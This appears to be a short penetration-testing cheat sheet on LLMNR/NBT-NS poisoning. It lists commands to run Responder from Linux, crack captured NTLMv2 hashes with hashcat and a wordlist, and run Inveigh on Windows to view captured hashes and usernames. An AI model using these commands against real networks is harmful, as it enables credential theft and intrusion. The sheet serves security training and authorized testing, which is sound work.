LLMNR/NBT-NS Poisoning

Several tools can be used to attempt LLMNR & NBT-NS poisoning:

From Linux

# Starting Responder
sudo responder -I ens224

# Cracking an NTLMv2 Hash With Hashcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

From Windows

# Use the C# version of Inveigh; the PowerShell version is not updated
# Compile and run the executable
PS C:\> .\Inveigh.exe

# Press the Esc key to enter the console while Inveigh is running.
# Typing HELP and pressing Enter presents several options.
# View unique captured hashes by typing GET NTLMV2UNIQUE.
# Type GET NTLMV2USERNAMES to see which usernames have been collected.
